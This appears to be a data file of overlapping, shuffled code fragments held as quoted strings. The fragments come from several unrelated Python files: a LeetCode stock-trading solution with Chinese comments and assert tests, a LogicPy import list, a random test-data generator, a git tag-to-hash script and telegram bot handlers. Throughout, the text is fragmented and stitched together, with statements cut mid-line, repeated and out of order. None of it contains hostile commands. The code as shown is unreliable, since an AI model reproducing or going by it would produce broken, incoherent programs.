assert(solution.maxProfit(1, [8,1,4]) == 3) assert(solution.maxProfit(1, [8,4,1]) == 0) ## len(prices) >= 4", "k == 0: return 0 # k = 正无穷 if k >= nLen//2:", "= 4 。 # 随后,在第 5 天 (股票价格 = 0) 的时候买入,在第 6 天", "0: return 0 # k = 正无穷 if k >= nLen//2: dp_i_0 =", "# 解释: 在第 2 天 (股票价格 = 2) 的时候买入,在第 3 天 (股票价格 =", "max(dp_i_1, temp - prices[i]) return dp_i_0 # k = 有限次数 dp_i_k_0 = []", "in range(nLen): temp = dp_i_0 dp_i_0 = max(dp_i_0, dp_i_1 + prices[i]) dp_i_1 =", "6) assert(solution.maxProfit(2, [7,1,5,3,6,4,7]) == 8) assert(solution.maxProfit(3, [7,1,5,3,6,4,7]) == 10) assert(solution.maxProfit(4, [7,1,5,3,6,4,7]) == 10)", ">= nLen//2: dp_i_0 = 0 dp_i_1 = -sys.maxsize for i in range(nLen): temp", "## len(prices) = 2 assert(solution.maxProfit(1, [1,4]) == 3) assert(solution.maxProfit(2, [1,4]) == 3) assert(solution.maxProfit(2,", "1次交易 assert(solution.maxProfit(1, [1,2,3,4,5]) == 4) ### 2次交易 assert(solution.maxProfit(1, [7,1,5,3,6,4]) == 5) assert(solution.maxProfit(2, [7,1,5,3,6,4])", "i in range(nLen+1): dp_i_k_1[i][0] = -sys.maxsize for i in range(1, nLen+1): for j", "# def maxProfit(self, k: int, prices: List[int]) -> int: def maxProfit(self, k, prices):", ">= 4 ### 0次交易 assert(solution.maxProfit(1, [7,6,4,3,1]) == 0) ### 1次交易 assert(solution.maxProfit(1, [1,2,3,4,5]) ==", "if nLen <= 1 or k == 0: return 0 # k =", "空间 # 代码 import sys class Solution: # def maxProfit(self, k: int, prices:", "k 笔交易。 # 注意: 你不能同时参与多笔交易(你必须在再次购买前出售掉之前的股票)。 # 示例 1: # 输入: [2,4,1], k =", "in range(k+1): dp_i_k_1[0][j] = -sys.maxsize for i in range(nLen+1): dp_i_k_1[i][0] = -sys.maxsize for", "prices: List[int]) -> int: def maxProfit(self, k, prices): nLen = len(prices) if nLen", "[] for i in range(nLen+1): dp_i_k_1.append([0]*(k+1)) for j in range(k+1): dp_i_k_1[0][j] = -sys.maxsize", "dp_i_k_1.append([0]*(k+1)) for j in range(k+1): dp_i_k_1[0][j] = -sys.maxsize for i in range(nLen+1): dp_i_k_1[i][0]", "注意: 你不能同时参与多笔交易(你必须在再次购买前出售掉之前的股票)。 # 示例 1: # 输入: [2,4,1], k = 2 # 输出:", "for j in 
range(k,0,-1): dp_i_k_0[i][j] = max(dp_i_k_0[i-1][j], dp_i_k_1[i-1][j] + prices[i-1]) dp_i_k_1[i][j] = max(dp_i_k_1[i-1][j],", "= 2 。 # 示例 2: # 输入: [3,2,6,5,0,3], k = 2 #", "。 # 随后,在第 5 天 (股票价格 = 0) 的时候买入,在第 6 天 (股票价格 =", "# 代码 import sys class Solution: # def maxProfit(self, k: int, prices: List[int])", "prices[i]) dp_i_1 = max(dp_i_1, temp - prices[i]) return dp_i_0 # k = 有限次数", "# 思路 # 复杂度(时间/空间) # 时间 # 空间 # 代码 import sys class", "= -sys.maxsize for i in range(nLen): temp = dp_i_0 dp_i_0 = max(dp_i_0, dp_i_1", "有限次数 dp_i_k_0 = [] for i in range(nLen+1): dp_i_k_0.append([0]*(k+1)) dp_i_k_1 = [] for", "for i in range(nLen+1): dp_i_k_1.append([0]*(k+1)) for j in range(k+1): dp_i_k_1[0][j] = -sys.maxsize for", "j in range(k,0,-1): dp_i_k_0[i][j] = max(dp_i_k_0[i-1][j], dp_i_k_1[i-1][j] + prices[i-1]) dp_i_k_1[i][j] = max(dp_i_k_1[i-1][j], dp_i_k_0[i-1][j-1]", "in range(nLen+1): dp_i_k_1.append([0]*(k+1)) for j in range(k+1): dp_i_k_1[0][j] = -sys.maxsize for i in", "max(dp_i_k_1[i-1][j], dp_i_k_0[i-1][j-1] - prices[i-1]) return dp_i_k_0[nLen][k] # 边界 solution = Solution() ## len(prices)", "[7,1,5,3,6,4]) == 7) ### 3次交易 assert(solution.maxProfit(0, [7,1,5,3,6,4,7]) == 0) assert(solution.maxProfit(1, [7,1,5,3,6,4,7]) == 6)", "= [] for i in range(nLen+1): dp_i_k_0.append([0]*(k+1)) dp_i_k_1 = [] for i in", "4-2 = 2 。 # 示例 2: # 输入: [3,2,6,5,0,3], k = 2", "[]) == 0) assert(solution.maxProfit(1, [1]) == 0) ## len(prices) = 2 assert(solution.maxProfit(1, [1,4])", "assert(solution.maxProfit(2, [4,1]) == 0) ## len(prices) = 3 assert(solution.maxProfit(1, [1,4,8]) == 7) assert(solution.maxProfit(1,", "i in range(nLen): temp = dp_i_0 dp_i_0 = max(dp_i_0, dp_i_1 + prices[i]) dp_i_1", "在第 2 天 (股票价格 = 2) 的时候买入,在第 3 天 (股票价格 = 6) 的时候卖出,", "天的价格。 # 设计一个算法来计算你所能获取的最大利润。你最多可以完成 k 笔交易。 # 注意: 你不能同时参与多笔交易(你必须在再次购买前出售掉之前的股票)。 # 示例 1: # 输入:", "nLen <= 1 or k == 0: return 0 # k = 正无穷", "# 边界 solution = Solution() ## len(prices) <= 1 assert(solution.maxProfit(1, []) == 0)", 
"dp_i_k_0[nLen][k] # 边界 solution = Solution() ## len(prices) <= 1 assert(solution.maxProfit(1, []) ==", "(股票价格 = 0) 的时候买入,在第 6 天 (股票价格 = 3) 的时候卖出, 这笔交易所能获得利润 = 3-0", "-*- coding: utf-8 -*- # __author__ = xiaobao # __date__ = 2019/11/13 12:39:48", "= len(prices) if nLen <= 1 or k == 0: return 0 #", "思路 # 复杂度(时间/空间) # 时间 # 空间 # 代码 import sys class Solution:", "<= 1 or k == 0: return 0 # k = 正无穷 if", "# 输出: 7 # 解释: 在第 2 天 (股票价格 = 2) 的时候买入,在第 3", "# __author__ = xiaobao # __date__ = 2019/11/13 12:39:48 # desc: desc #", "xiaobao # __date__ = 2019/11/13 12:39:48 # desc: desc # 给定一个数组,它的第 i 个元素是一支给定的股票在第", "len(prices) <= 1 assert(solution.maxProfit(1, []) == 0) assert(solution.maxProfit(1, [1]) == 0) ## len(prices)", "return dp_i_0 # k = 有限次数 dp_i_k_0 = [] for i in range(nLen+1):", "5 天 (股票价格 = 0) 的时候买入,在第 6 天 (股票价格 = 3) 的时候卖出, 这笔交易所能获得利润", "= 3 assert(solution.maxProfit(1, [1,4,8]) == 7) assert(solution.maxProfit(1, [1,8,4]) == 7) assert(solution.maxProfit(1, [4,1,8]) ==", "range(1, nLen+1): for j in range(k,0,-1): dp_i_k_0[i][j] = max(dp_i_k_0[i-1][j], dp_i_k_1[i-1][j] + prices[i-1]) dp_i_k_1[i][j]", "# 复杂度(时间/空间) # 时间 # 空间 # 代码 import sys class Solution: #", "4 ### 0次交易 assert(solution.maxProfit(1, [7,6,4,3,1]) == 0) ### 1次交易 assert(solution.maxProfit(1, [1,2,3,4,5]) == 4)", "= 3) 的时候卖出, 这笔交易所能获得利润 = 3-0 = 3 。 # 来源:力扣(LeetCode) # 链接:https://leetcode-cn.com/problems/best-time-to-buy-and-sell-stock-iv", "解释: 在第 1 天 (股票价格 = 2) 的时候买入,在第 2 天 (股票价格 = 4)", "- prices[i-1]) return dp_i_k_0[nLen][k] # 边界 solution = Solution() ## len(prices) <= 1", "边界 solution = Solution() ## len(prices) <= 1 assert(solution.maxProfit(1, []) == 0) assert(solution.maxProfit(1,", "# -*- coding: utf-8 -*- # __author__ = xiaobao # __date__ = 2019/11/13", "maxProfit(self, k, prices): nLen = len(prices) if nLen <= 1 or k ==", "if k >= nLen//2: dp_i_0 = 0 dp_i_1 = -sys.maxsize for i in", "2 # 输出: 7 # 解释: 在第 2 天 (股票价格 = 2) 的时候买入,在第", "# 空间 # 代码 import sys class Solution: # def maxProfit(self, k: int," ]
[ "import LogicPy.flipflops as flipflops import LogicPy.combination_logic as combination_logic import LogicPy.display_terminals as display_terminals import", "LogicPy.main_functions as main_functions import LogicPy.conversion as conversion import LogicPy.gates as gates import LogicPy.flipflops", "LogicPy.conversion as conversion import LogicPy.gates as gates import LogicPy.flipflops as flipflops import LogicPy.combination_logic", "as main_functions import LogicPy.conversion as conversion import LogicPy.gates as gates import LogicPy.flipflops as", "as display_terminals import LogicPy.arithematic_circuit as arithematic_circuit import LogicPy.counters as counters import LogicPy.shift_registers as", "LogicPy.gates as gates import LogicPy.flipflops as flipflops import LogicPy.combination_logic as combination_logic import LogicPy.display_terminals", "combination_logic import LogicPy.display_terminals as display_terminals import LogicPy.arithematic_circuit as arithematic_circuit import LogicPy.counters as counters", "import LogicPy.gates as gates import LogicPy.flipflops as flipflops import LogicPy.combination_logic as combination_logic import", "flipflops import LogicPy.combination_logic as combination_logic import LogicPy.display_terminals as display_terminals import LogicPy.arithematic_circuit as arithematic_circuit", "as flipflops import LogicPy.combination_logic as combination_logic import LogicPy.display_terminals as display_terminals import LogicPy.arithematic_circuit as", "display_terminals import LogicPy.arithematic_circuit as arithematic_circuit import LogicPy.counters as counters import LogicPy.shift_registers as shift_registers", "as combination_logic import LogicPy.display_terminals as display_terminals import LogicPy.arithematic_circuit as arithematic_circuit import LogicPy.counters as", "import LogicPy.conversion as conversion import LogicPy.gates as gates import LogicPy.flipflops as flipflops import", "main_functions import LogicPy.conversion as conversion 
import LogicPy.gates as gates import LogicPy.flipflops as flipflops", "LogicPy.display_terminals as display_terminals import LogicPy.arithematic_circuit as arithematic_circuit import LogicPy.counters as counters import LogicPy.shift_registers", "<filename>LogicPy/__init__.py import LogicPy.main_functions as main_functions import LogicPy.conversion as conversion import LogicPy.gates as gates", "conversion import LogicPy.gates as gates import LogicPy.flipflops as flipflops import LogicPy.combination_logic as combination_logic", "LogicPy.flipflops as flipflops import LogicPy.combination_logic as combination_logic import LogicPy.display_terminals as display_terminals import LogicPy.arithematic_circuit", "LogicPy.combination_logic as combination_logic import LogicPy.display_terminals as display_terminals import LogicPy.arithematic_circuit as arithematic_circuit import LogicPy.counters", "gates import LogicPy.flipflops as flipflops import LogicPy.combination_logic as combination_logic import LogicPy.display_terminals as display_terminals", "import LogicPy.display_terminals as display_terminals import LogicPy.arithematic_circuit as arithematic_circuit import LogicPy.counters as counters import", "import LogicPy.combination_logic as combination_logic import LogicPy.display_terminals as display_terminals import LogicPy.arithematic_circuit as arithematic_circuit import", "as conversion import LogicPy.gates as gates import LogicPy.flipflops as flipflops import LogicPy.combination_logic as", "import LogicPy.main_functions as main_functions import LogicPy.conversion as conversion import LogicPy.gates as gates import", "as gates import LogicPy.flipflops as flipflops import LogicPy.combination_logic as combination_logic import LogicPy.display_terminals as" ]
[ "count in range(size): message += str(random.randint(0,1)) return message n = 32 * 10000", "'' for count in range(size): message += str(random.randint(0,1)) return message n = 32", "random binary string def generateMessage (size): message = '' for count in range(size):", "string def generateMessage (size): message = '' for count in range(size): message +=", "for count in range(size): message += str(random.randint(0,1)) return message n = 32 *", "def generateMessage (size): message = '' for count in range(size): message += str(random.randint(0,1))", "n = 32 * 10000 # size of data file = open(\"testdata.txt\", \"w\")", "import random # generate a random binary string def generateMessage (size): message =", "a random binary string def generateMessage (size): message = '' for count in", "= '' for count in range(size): message += str(random.randint(0,1)) return message n =", "return message n = 32 * 10000 # size of data file =", "message += str(random.randint(0,1)) return message n = 32 * 10000 # size of", "(size): message = '' for count in range(size): message += str(random.randint(0,1)) return message", "# generate a random binary string def generateMessage (size): message = '' for", "message = '' for count in range(size): message += str(random.randint(0,1)) return message n", "str(random.randint(0,1)) return message n = 32 * 10000 # size of data file", "<reponame>neeladripal/bcse-lab import random # generate a random binary string def generateMessage (size): message", "+= str(random.randint(0,1)) return message n = 32 * 10000 # size of data", "random # generate a random binary string def generateMessage (size): message = ''", "32 * 10000 # size of data file = open(\"testdata.txt\", \"w\") file.write(generateMessage(n)) file.close()", "generateMessage (size): message = '' for count in range(size): message += str(random.randint(0,1)) return", "in range(size): message += str(random.randint(0,1)) return message n = 32 * 10000 #", "message n = 32 * 10000 # size of data 
file = open(\"testdata.txt\",", "= 32 * 10000 # size of data file = open(\"testdata.txt\", \"w\") file.write(generateMessage(n))", "range(size): message += str(random.randint(0,1)) return message n = 32 * 10000 # size", "binary string def generateMessage (size): message = '' for count in range(size): message", "generate a random binary string def generateMessage (size): message = '' for count" ]
[ "in fobj.readlines()]) git_repo = Repo(\"dvc\") hashes = [git_repo.commit(t).hexsha + os.linesep for t in", "convert_to_sha(tags_filename=\"tags.txt\", hashes_filename=\"hashes.txt\"): tags = [] with open(tags_filename, \"r\") as fobj: tags.extend([l.strip() for l", "os from git import Repo def convert_to_sha(tags_filename=\"tags.txt\", hashes_filename=\"hashes.txt\"): tags = [] with open(tags_filename,", "for l in fobj.readlines()]) git_repo = Repo(\"dvc\") hashes = [git_repo.commit(t).hexsha + os.linesep for", "+ os.linesep for t in tags] with open(hashes_filename, \"w\") as fobj: fobj.writelines(hashes) convert_to_sha()", "as fobj: tags.extend([l.strip() for l in fobj.readlines()]) git_repo = Repo(\"dvc\") hashes = [git_repo.commit(t).hexsha", "Repo def convert_to_sha(tags_filename=\"tags.txt\", hashes_filename=\"hashes.txt\"): tags = [] with open(tags_filename, \"r\") as fobj: tags.extend([l.strip()", "\"r\") as fobj: tags.extend([l.strip() for l in fobj.readlines()]) git_repo = Repo(\"dvc\") hashes =", "import os from git import Repo def convert_to_sha(tags_filename=\"tags.txt\", hashes_filename=\"hashes.txt\"): tags = [] with", "def convert_to_sha(tags_filename=\"tags.txt\", hashes_filename=\"hashes.txt\"): tags = [] with open(tags_filename, \"r\") as fobj: tags.extend([l.strip() for", "tags.extend([l.strip() for l in fobj.readlines()]) git_repo = Repo(\"dvc\") hashes = [git_repo.commit(t).hexsha + os.linesep", "git import Repo def convert_to_sha(tags_filename=\"tags.txt\", hashes_filename=\"hashes.txt\"): tags = [] with open(tags_filename, \"r\") as", "Repo(\"dvc\") hashes = [git_repo.commit(t).hexsha + os.linesep for t in tags] with open(hashes_filename, \"w\")", "[git_repo.commit(t).hexsha + os.linesep for t in tags] with open(hashes_filename, \"w\") as fobj: fobj.writelines(hashes)", "hashes = [git_repo.commit(t).hexsha + os.linesep for t in tags] with open(hashes_filename, \"w\") as", "= [git_repo.commit(t).hexsha + os.linesep for t in tags] with 
open(hashes_filename, \"w\") as fobj:", "with open(tags_filename, \"r\") as fobj: tags.extend([l.strip() for l in fobj.readlines()]) git_repo = Repo(\"dvc\")", "fobj.readlines()]) git_repo = Repo(\"dvc\") hashes = [git_repo.commit(t).hexsha + os.linesep for t in tags]", "import Repo def convert_to_sha(tags_filename=\"tags.txt\", hashes_filename=\"hashes.txt\"): tags = [] with open(tags_filename, \"r\") as fobj:", "open(tags_filename, \"r\") as fobj: tags.extend([l.strip() for l in fobj.readlines()]) git_repo = Repo(\"dvc\") hashes", "<gh_stars>0 import os from git import Repo def convert_to_sha(tags_filename=\"tags.txt\", hashes_filename=\"hashes.txt\"): tags = []", "hashes_filename=\"hashes.txt\"): tags = [] with open(tags_filename, \"r\") as fobj: tags.extend([l.strip() for l in", "git_repo = Repo(\"dvc\") hashes = [git_repo.commit(t).hexsha + os.linesep for t in tags] with", "= Repo(\"dvc\") hashes = [git_repo.commit(t).hexsha + os.linesep for t in tags] with open(hashes_filename,", "tags = [] with open(tags_filename, \"r\") as fobj: tags.extend([l.strip() for l in fobj.readlines()])", "= [] with open(tags_filename, \"r\") as fobj: tags.extend([l.strip() for l in fobj.readlines()]) git_repo", "l in fobj.readlines()]) git_repo = Repo(\"dvc\") hashes = [git_repo.commit(t).hexsha + os.linesep for t", "fobj: tags.extend([l.strip() for l in fobj.readlines()]) git_repo = Repo(\"dvc\") hashes = [git_repo.commit(t).hexsha +", "from git import Repo def convert_to_sha(tags_filename=\"tags.txt\", hashes_filename=\"hashes.txt\"): tags = [] with open(tags_filename, \"r\")", "[] with open(tags_filename, \"r\") as fobj: tags.extend([l.strip() for l in fobj.readlines()]) git_repo =" ]
[]
[ "CCA = 1 SECOND = 2 def start(update, context): username = update.message.from_user.username first_name", "your CCAs.\" % ( first_name), reply_markup=reply_markup) return CCA def end(update, context): query =", "import InlineKeyboardButton, InlineKeyboardMarkup from telegram.ext import ConversationHandler import logging logging.basicConfig( format='%(asctime)s - %(name)s", "the conversation.\", first_name) if is_registered(username): ccas = get_user_ccas(username) keyboard = [[InlineKeyboardButton( cca, callback_data=cca)]", "one of your CCAs.\" % ( first_name), reply_markup=reply_markup) return CCA def end(update, context):", "= query.from_user.username first_name = query.from_user.first_name ccas = get_user_ccas(username) keyboard = [[InlineKeyboardButton( cca, callback_data=cca)]", "start(update, context): username = update.message.from_user.username first_name = update.message.from_user.first_name logger.info(\"User %s started the conversation.\",", "user. Please contact your CCA Head to register you or /register here.') def", "you are not a registered user. Please contact your CCA Head to register", "InlineKeyboardMarkup from telegram.ext import ConversationHandler import logging logging.basicConfig( format='%(asctime)s - %(name)s - %(levelname)s", "username = query.from_user.username first_name = query.from_user.first_name ccas = get_user_ccas(username) keyboard = [[InlineKeyboardButton( cca,", "def end(update, context): query = update.callback_query query.answer() query.edit_message_text(text=\"Ok, see you next time!\") return", "first_name), reply_markup=reply_markup) return CCA else: update.message.reply_text( 'Sorry, you are not a registered user.", "query.edit_message_text(\"Hi %s! Please select one of your CCAs.\" % ( first_name), reply_markup=reply_markup) return", "callback_data=cca)] for cca in ccas] reply_markup = InlineKeyboardMarkup(keyboard) update.message.reply_text(\"Hi %s! 
Please select one", "query.from_user.first_name ccas = get_user_ccas(username) keyboard = [[InlineKeyboardButton( cca, callback_data=cca)] for cca in ccas]", "( first_name), reply_markup=reply_markup) return CCA else: update.message.reply_text( 'Sorry, you are not a registered", "( first_name), reply_markup=reply_markup) return CCA def end(update, context): query = update.callback_query query.answer() query.edit_message_text(text=\"Ok,", "2 def start(update, context): username = update.message.from_user.username first_name = update.message.from_user.first_name logger.info(\"User %s started", "first_name), reply_markup=reply_markup) return CCA def end(update, context): query = update.callback_query query.answer() query.edit_message_text(text=\"Ok, see", "[[InlineKeyboardButton( cca, callback_data=cca)] for cca in ccas] reply_markup = InlineKeyboardMarkup(keyboard) update.message.reply_text(\"Hi %s! Please", "Please contact your CCA Head to register you or /register here.') def back(update,", "context): query = update.callback_query username = query.from_user.username first_name = query.from_user.first_name ccas = get_user_ccas(username)", "ConversationHandler import logging logging.basicConfig( format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO) logger", "query.from_user.username first_name = query.from_user.first_name ccas = get_user_ccas(username) keyboard = [[InlineKeyboardButton( cca, callback_data=cca)] for", "here.') def back(update, context): query = update.callback_query username = query.from_user.username first_name = query.from_user.first_name", "from telegram.ext import ConversationHandler import logging logging.basicConfig( format='%(asctime)s - %(name)s - %(levelname)s -", "update.message.reply_text(\"Hi %s! 
Please select one of your CCAs.\" % ( first_name), reply_markup=reply_markup) return", "- %(message)s', level=logging.INFO) logger = logging.getLogger(__name__) CCA = 1 SECOND = 2 def", "CCA def end(update, context): query = update.callback_query query.answer() query.edit_message_text(text=\"Ok, see you next time!\")", "import get_user_ccas, is_registered, register_user from telegram import InlineKeyboardButton, InlineKeyboardMarkup from telegram.ext import ConversationHandler", "ccas] reply_markup = InlineKeyboardMarkup(keyboard) update.message.reply_text(\"Hi %s! Please select one of your CCAs.\" %", "= update.message.from_user.username first_name = update.message.from_user.first_name logger.info(\"User %s started the conversation.\", first_name) if is_registered(username):", "%(levelname)s - %(message)s', level=logging.INFO) logger = logging.getLogger(__name__) CCA = 1 SECOND = 2", "back(update, context): query = update.callback_query username = query.from_user.username first_name = query.from_user.first_name ccas =", "is_registered(username): ccas = get_user_ccas(username) keyboard = [[InlineKeyboardButton( cca, callback_data=cca)] for cca in ccas]", "logging logging.basicConfig( format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO) logger = logging.getLogger(__name__)", "CCA else: update.message.reply_text( 'Sorry, you are not a registered user. Please contact your", "username = update.message.from_user.username first_name = update.message.from_user.first_name logger.info(\"User %s started the conversation.\", first_name) if", "InlineKeyboardMarkup(keyboard) query.edit_message_text(\"Hi %s! Please select one of your CCAs.\" % ( first_name), reply_markup=reply_markup)", "if is_registered(username): ccas = get_user_ccas(username) keyboard = [[InlineKeyboardButton( cca, callback_data=cca)] for cca in", "'Sorry, you are not a registered user. 
Please contact your CCA Head to", "update.message.from_user.first_name logger.info(\"User %s started the conversation.\", first_name) if is_registered(username): ccas = get_user_ccas(username) keyboard", "select one of your CCAs.\" % ( first_name), reply_markup=reply_markup) return CCA else: update.message.reply_text(", "= InlineKeyboardMarkup(keyboard) query.edit_message_text(\"Hi %s! Please select one of your CCAs.\" % ( first_name),", "import logging logging.basicConfig( format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO) logger =", "InlineKeyboardButton, InlineKeyboardMarkup from telegram.ext import ConversationHandler import logging logging.basicConfig( format='%(asctime)s - %(name)s -", "first_name = query.from_user.first_name ccas = get_user_ccas(username) keyboard = [[InlineKeyboardButton( cca, callback_data=cca)] for cca", "reply_markup = InlineKeyboardMarkup(keyboard) query.edit_message_text(\"Hi %s! Please select one of your CCAs.\" % (", "cca in ccas] reply_markup = InlineKeyboardMarkup(keyboard) update.message.reply_text(\"Hi %s! 
Please select one of your", "1 SECOND = 2 def start(update, context): username = update.message.from_user.username first_name = update.message.from_user.first_name", "your CCA Head to register you or /register here.') def back(update, context): query", "or /register here.') def back(update, context): query = update.callback_query username = query.from_user.username first_name", "update.message.from_user.username first_name = update.message.from_user.first_name logger.info(\"User %s started the conversation.\", first_name) if is_registered(username): ccas", "= update.callback_query username = query.from_user.username first_name = query.from_user.first_name ccas = get_user_ccas(username) keyboard =", "keyboard = [[InlineKeyboardButton( cca, callback_data=cca)] for cca in ccas] reply_markup = InlineKeyboardMarkup(keyboard) update.message.reply_text(\"Hi", "from telegram import InlineKeyboardButton, InlineKeyboardMarkup from telegram.ext import ConversationHandler import logging logging.basicConfig( format='%(asctime)s", "get_user_ccas(username) keyboard = [[InlineKeyboardButton( cca, callback_data=cca)] for cca in ccas] reply_markup = InlineKeyboardMarkup(keyboard)", "%s started the conversation.\", first_name) if is_registered(username): ccas = get_user_ccas(username) keyboard = [[InlineKeyboardButton(", "update.callback_query username = query.from_user.username first_name = query.from_user.first_name ccas = get_user_ccas(username) keyboard = [[InlineKeyboardButton(", "reply_markup=reply_markup) return CCA else: update.message.reply_text( 'Sorry, you are not a registered user. 
Please", "= query.from_user.first_name ccas = get_user_ccas(username) keyboard = [[InlineKeyboardButton( cca, callback_data=cca)] for cca in", "= update.message.from_user.first_name logger.info(\"User %s started the conversation.\", first_name) if is_registered(username): ccas = get_user_ccas(username)", "import ConversationHandler import logging logging.basicConfig( format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)", "= InlineKeyboardMarkup(keyboard) update.message.reply_text(\"Hi %s! Please select one of your CCAs.\" % ( first_name),", "- %(levelname)s - %(message)s', level=logging.INFO) logger = logging.getLogger(__name__) CCA = 1 SECOND =", "register you or /register here.') def back(update, context): query = update.callback_query username =", "of your CCAs.\" % ( first_name), reply_markup=reply_markup) return CCA def end(update, context): query", "CCAs.\" % ( first_name), reply_markup=reply_markup) return CCA def end(update, context): query = update.callback_query", "InlineKeyboardMarkup(keyboard) update.message.reply_text(\"Hi %s! Please select one of your CCAs.\" % ( first_name), reply_markup=reply_markup)", "select one of your CCAs.\" % ( first_name), reply_markup=reply_markup) return CCA def end(update,", "= 2 def start(update, context): username = update.message.from_user.username first_name = update.message.from_user.first_name logger.info(\"User %s", "logging.getLogger(__name__) CCA = 1 SECOND = 2 def start(update, context): username = update.message.from_user.username", "level=logging.INFO) logger = logging.getLogger(__name__) CCA = 1 SECOND = 2 def start(update, context):", "to register you or /register here.') def back(update, context): query = update.callback_query username", "- %(name)s - %(levelname)s - %(message)s', level=logging.INFO) logger = logging.getLogger(__name__) CCA = 1", "are not a registered user. Please contact your CCA Head to register you", "registered user. 
Please contact your CCA Head to register you or /register here.')", "for cca in ccas] reply_markup = InlineKeyboardMarkup(keyboard) query.edit_message_text(\"Hi %s! Please select one of", "= [[InlineKeyboardButton( cca, callback_data=cca)] for cca in ccas] reply_markup = InlineKeyboardMarkup(keyboard) update.message.reply_text(\"Hi %s!", "def start(update, context): username = update.message.from_user.username first_name = update.message.from_user.first_name logger.info(\"User %s started the", "reply_markup=reply_markup) return CCA def end(update, context): query = update.callback_query query.answer() query.edit_message_text(text=\"Ok, see you", "format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO) logger = logging.getLogger(__name__) CCA =", "= 1 SECOND = 2 def start(update, context): username = update.message.from_user.username first_name =", "/register here.') def back(update, context): query = update.callback_query username = query.from_user.username first_name =", "CCAs.\" % ( first_name), reply_markup=reply_markup) return CCA else: update.message.reply_text( 'Sorry, you are not", "else: update.message.reply_text( 'Sorry, you are not a registered user. Please contact your CCA", "cca in ccas] reply_markup = InlineKeyboardMarkup(keyboard) query.edit_message_text(\"Hi %s! Please select one of your", "return CCA def end(update, context): query = update.callback_query query.answer() query.edit_message_text(text=\"Ok, see you next", "in ccas] reply_markup = InlineKeyboardMarkup(keyboard) update.message.reply_text(\"Hi %s! 
Please select one of your CCAs.\"", "logger.info(\"User %s started the conversation.\", first_name) if is_registered(username): ccas = get_user_ccas(username) keyboard =", "telegram import InlineKeyboardButton, InlineKeyboardMarkup from telegram.ext import ConversationHandler import logging logging.basicConfig( format='%(asctime)s -", "= logging.getLogger(__name__) CCA = 1 SECOND = 2 def start(update, context): username =", "you or /register here.') def back(update, context): query = update.callback_query username = query.from_user.username", "cca, callback_data=cca)] for cca in ccas] reply_markup = InlineKeyboardMarkup(keyboard) query.edit_message_text(\"Hi %s! Please select", "update.message.reply_text( 'Sorry, you are not a registered user. Please contact your CCA Head", "% ( first_name), reply_markup=reply_markup) return CCA def end(update, context): query = update.callback_query query.answer()", "end(update, context): query = update.callback_query query.answer() query.edit_message_text(text=\"Ok, see you next time!\") return ConversationHandler.END", "logging.basicConfig( format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO) logger = logging.getLogger(__name__) CCA", "cca, callback_data=cca)] for cca in ccas] reply_markup = InlineKeyboardMarkup(keyboard) update.message.reply_text(\"Hi %s! Please select", "%s! Please select one of your CCAs.\" % ( first_name), reply_markup=reply_markup) return CCA", "return CCA else: update.message.reply_text( 'Sorry, you are not a registered user. 
Please contact", "telegram.ext import ConversationHandler import logging logging.basicConfig( format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',", "is_registered, register_user from telegram import InlineKeyboardButton, InlineKeyboardMarkup from telegram.ext import ConversationHandler import logging", "query = update.callback_query username = query.from_user.username first_name = query.from_user.first_name ccas = get_user_ccas(username) keyboard", "SECOND = 2 def start(update, context): username = update.message.from_user.username first_name = update.message.from_user.first_name logger.info(\"User", "callback_data=cca)] for cca in ccas] reply_markup = InlineKeyboardMarkup(keyboard) query.edit_message_text(\"Hi %s! Please select one", "%(name)s - %(levelname)s - %(message)s', level=logging.INFO) logger = logging.getLogger(__name__) CCA = 1 SECOND", "spreadsheet.utility import get_user_ccas, is_registered, register_user from telegram import InlineKeyboardButton, InlineKeyboardMarkup from telegram.ext import", "[[InlineKeyboardButton( cca, callback_data=cca)] for cca in ccas] reply_markup = InlineKeyboardMarkup(keyboard) query.edit_message_text(\"Hi %s! Please", "logger = logging.getLogger(__name__) CCA = 1 SECOND = 2 def start(update, context): username", "CCA Head to register you or /register here.') def back(update, context): query =", "% ( first_name), reply_markup=reply_markup) return CCA else: update.message.reply_text( 'Sorry, you are not a", "started the conversation.\", first_name) if is_registered(username): ccas = get_user_ccas(username) keyboard = [[InlineKeyboardButton( cca,", "def back(update, context): query = update.callback_query username = query.from_user.username first_name = query.from_user.first_name ccas", "register_user from telegram import InlineKeyboardButton, InlineKeyboardMarkup from telegram.ext import ConversationHandler import logging logging.basicConfig(", "a registered user. 
Please contact your CCA Head to register you or /register", "not a registered user. Please contact your CCA Head to register you or", "first_name) if is_registered(username): ccas = get_user_ccas(username) keyboard = [[InlineKeyboardButton( cca, callback_data=cca)] for cca", "reply_markup = InlineKeyboardMarkup(keyboard) update.message.reply_text(\"Hi %s! Please select one of your CCAs.\" % (", "Head to register you or /register here.') def back(update, context): query = update.callback_query", "ccas = get_user_ccas(username) keyboard = [[InlineKeyboardButton( cca, callback_data=cca)] for cca in ccas] reply_markup", "= [[InlineKeyboardButton( cca, callback_data=cca)] for cca in ccas] reply_markup = InlineKeyboardMarkup(keyboard) query.edit_message_text(\"Hi %s!", "%(message)s', level=logging.INFO) logger = logging.getLogger(__name__) CCA = 1 SECOND = 2 def start(update,", "for cca in ccas] reply_markup = InlineKeyboardMarkup(keyboard) update.message.reply_text(\"Hi %s! Please select one of", "one of your CCAs.\" % ( first_name), reply_markup=reply_markup) return CCA else: update.message.reply_text( 'Sorry,", "in ccas] reply_markup = InlineKeyboardMarkup(keyboard) query.edit_message_text(\"Hi %s! 
